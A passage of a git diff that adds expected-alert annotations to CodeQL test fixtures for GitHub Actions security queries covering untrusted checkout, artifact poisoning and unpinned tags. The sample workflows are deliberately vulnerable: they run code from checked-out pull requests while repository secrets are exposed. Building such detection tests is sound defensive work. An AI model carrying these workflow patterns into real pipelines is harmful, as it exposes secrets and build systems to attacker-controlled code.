a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml @@ -17,7 +17,7 @@ jobs: GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - if: github.event_name == 'workflow_run' + - if: github.event_name == 'workflow_run' # $ Alert[actions/unversioned-immutable-action] uses: ./.github/actions/download-artifact - id: resolve-step env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml index 3b8a6d6dd62..b338fbc5f16 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/critical] npm install npm run lint - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml index e8b5466f751..8bdb8fc75ed 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml @@ -22,12 +22,12 @@ jobs: with: ref: ${{ github.event.after || github.event.pull_request.head.sha }} - - name: Build + - name: Build # $ Alert[actions/untrusted-checkout/critical] working-directory: custom-payment-flow/client/android-kotlin run: | ./gradlew build - dependabot-auto-merge: + dependabot-auto-merge: # $ Sink[actions/untrusted-checkout/critical] if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} needs: android_build permissions: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml index 16bb6bf876c..448654fe45d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml @@ -87,8 +87,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml index 878b8377961..9f0ee5cf96d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml @@ -89,7 +89,7 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Alert[actions/unversioned-immutable-action] uses: ./.github/actions/setup-env with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml index 0a73e86d5fc..c8a68d73e58 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml @@ -12,7 +12,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Check repository permission for user - uses: sushichop/action-repository-permission@v2 + uses: sushichop/action-repository-permission@v2 # $ Alert[actions/unpinned-tag] with: required-permission: write reaction-permitted: rocket @@ -22,7 +22,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/head fetch-depth: 0 - - uses: actions/setup-node@v3 + - uses: actions/setup-node@v3 # $ Alert[actions/untrusted-checkout/high] with: node-version: 16 - name: Danger JS diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml index 6f03a0e966a..15ab46cc70a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml @@ -102,13 +102,13 @@ jobs: if: contains(github.event.comment.body, '/rollback') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - - name: Checkout PR branch + - name: Checkout PR branch # $ Alert[actions/unversioned-immutable-action] if: contains(github.event.comment.body, '/deploy') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment + - name: Get environment from comment # $ Alert[actions/unversioned-immutable-action] id: environment shell: bash env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml index 0be96a4140e..ef42bbb4a3c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml @@ -62,7 +62,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI + - name: Install GH CLI # $ Alert[actions/unversioned-immutable-action] uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords @@ -112,7 +112,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure + - name: Log into Azure # $ Alert[actions/unversioned-immutable-action] uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml index f679b772e34..d5de91480cb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -16,8 +16,8 @@ jobs: ref: ${{ github.event.workflow_run.head_branch }} fetch-depth: 0 - - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master + - name: SonarCloud Scan # $ Alert[actions/untrusted-checkout/critical] + uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml index 6347db51e3c..96de593004a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml @@ -30,12 +30,12 @@ jobs: let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); - - name: Unzip artifacts + - name: Unzip artifacts # $ Alert[actions/artifact-poisoning/critical] run: unzip rsc-pr-build-artifacts.zip - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master + uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml index 2f3b0bb876f..4cf7a49245c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml @@ -59,4 +59,4 @@ jobs: with: ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} - - run: ./bin/build-plugin-zip.sh + - run: ./bin/build-plugin-zip.sh # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml index c825cc73813..1404c559b0a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml @@ -29,7 +29,7 @@ jobs: run-id: ${{ github.event.workflow_run.id }} # Don't fail a build if the file doesn't exist continue-on-error: true - - name: Extract previously uploaded build scan content + - name: Extract previously uploaded build scan content # $ Alert[actions/artifact-poisoning/critical] if: ${{ steps.downloadBuildScan.outcome != 'failure'}} run: tar -xzf build-scan.tgz -C ~ - name: Publish @@ -37,6 +37,6 @@ jobs: # Don't fail a build if publishing fails continue-on-error: true run: | - ./gradlew buildScanPublishPrevious + ./gradlew buildScanPublishPrevious # $ Sink[actions/artifact-poisoning/critical] env: ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml index b1d776ef6c8..9b7a6c535c6 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -18,5 +18,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ inputs.git_ref }} - - run: | - ./cmd + - run: | # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] + ./cmd # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml index 5f67fecc09a..16d84cd70f7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml @@ -17,4 +17,4 @@ jobs: - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 with: ref: ${{ github.head_ref }} - - run: make foo + - run: make foo # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml index cc7f71a7b3e..afbb3f0a433 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml @@ -11,11 +11,11 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 0 - - uses: actions/github-script@v5 + - uses: actions/github-script@v5 # $ Alert[actions/untrusted-checkout/critical] with: github-token: ${{secrets.GITHUB_TOKEN}} script: | const { foo } = require('./foo'); - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml index d9aa2973e00..8c45b9f8930 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml @@ -30,7 +30,7 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm install + - run: npm install # $ Alert[actions/untrusted-checkout/medium] working-directory: scripts/github-actions/semantic-pull-request/ - name: Lint PR Title if: github.event_name == 'pull_request_target' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml index f82f493cd6e..5d143bb3f85 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout + - name: Checkout # $ Alert[actions/untrusted-checkout/medium] if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml index 7a346a897e4..99b3c1d4900 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -21,8 +21,8 @@ jobs: persist-credentials: false ref: refs/pull/${{ github.event.issue.number }}/head - - name: Setup PNPM - uses: pnpm/action-setup@v3 + - name: Setup PNPM # $ Alert[actions/untrusted-checkout/critical] + uses: pnpm/action-setup@v3 # $ Alert[actions/unpinned-tag] - name: Setup Node uses: actions/setup-node@v4 @@ -33,10 +33,10 @@ jobs: - name: Install dependencies run: pnpm install - - name: Build Packages + - name: Build Packages # $ Sink[actions/untrusted-checkout/critical] run: pnpm run build - - name: Get bench command + - name: Get bench command # $ Sink[actions/untrusted-checkout/critical] id: bench-command env: # protects from untrusted user input and command injection @@ -56,5 +56,5 @@ jobs: echo "$processed" >> $GITHUB_OUTPUT echo "BENCHEOF" >> $GITHUB_OUTPUT shell: bash - - run: python2.7 foo.py - - run: pip install --no-deps . + - run: python2.7 foo.py # $ Sink[actions/untrusted-checkout/critical] + - run: pip install --no-deps . # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml index 381cc16a6d1..bb28d082ac5 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml @@ -23,7 +23,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - name: Generate openapi.json + - name: Generate openapi.json # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" publish-unstable: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml index 6f7ff665be3..2c8007b9984 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -13,6 +13,6 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - run: + - run: # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] sed -f script/config foo.md > bar.md diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml index 6e7612144bc..eef43d011d4 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml @@ -7,13 +7,13 @@ jobs: runs-on: ubuntu-latest steps: - uses: foo/bar - - uses: foo/bar@v1 + - uses: foo/bar@v1 # $ Alert[actions/unpinned-tag] - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb - - uses: docker://foo/bar@latest + - uses: docker://foo/bar@latest # $ Alert[actions/unpinned-tag] - uses: docker://foo/bar@sha256:887a259a5a534f3c4f36cb02dca341673c6089431057242cdc931e9f133147e9 # SHA-256 pinned (64 hex chars) - should NOT be flagged - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb25b062c917b0c75f8b47d84d # SHA-1 pinned (40 hex chars) regression - should NOT be flagged - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 # Invalid 50-char hex string - should be flagged - - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 + - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 # $ Alert[actions/unpinned-tag] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 15d4813c40e..5119b7384ea 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -8,14 +8,14 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install npm run lint - test2: + test2: # $ Sink[actions/untrusted-checkout/critical] runs-on: ubuntu-latest env: HEAD: ${{ github.event.pull_request.head.sha }} @@ -23,10 +23,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index 47a0dfc6bd3..644738a7605 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -16,4 +16,4 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index 0a38be8b12b..1001c854978 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -10,4 +10,4 @@ jobs: steps: - uses: actions/checkout@v4 - uses: ./.github/actions/dangerous-git-checkout - - run: yarn test + - run: yarn test # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml index 7e154502c13..f0622820787 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -32,20 +32,20 @@ jobs: repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} - - name: Update version minor + - name: Update version minor # $ Alert[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version minor') run: | ./version.sh -u -n echo "BUMP_TYPE=minor" >> $GITHUB_ENV - - name: Update version major + - name: Update version major # $ Sink[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version major') run: | ./version.sh -u -m echo "BUMP_TYPE=major" >> $GITHUB_ENV - - name: Update version patch + - name: Update version patch # $ Sink[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version patch') run: | ./version.sh -u -p - echo "BUMP_TYPE=patch" >> $GITHUB_ENV + echo "BUMP_TYPE=patch" >> $GITHUB_ENV # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml index c802355d102..145cb77b829 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] with: - ref: ${{ env.HEAD }} + ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml index bcde60f55cb..3cbd9d698dd 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] with: - ref: ${{ env.HEAD }} + ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 3c5f6bf93e9..df0776a8b0f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -1,3 +1,22 @@ +#select +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | @@ -54,22 +73,3 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses 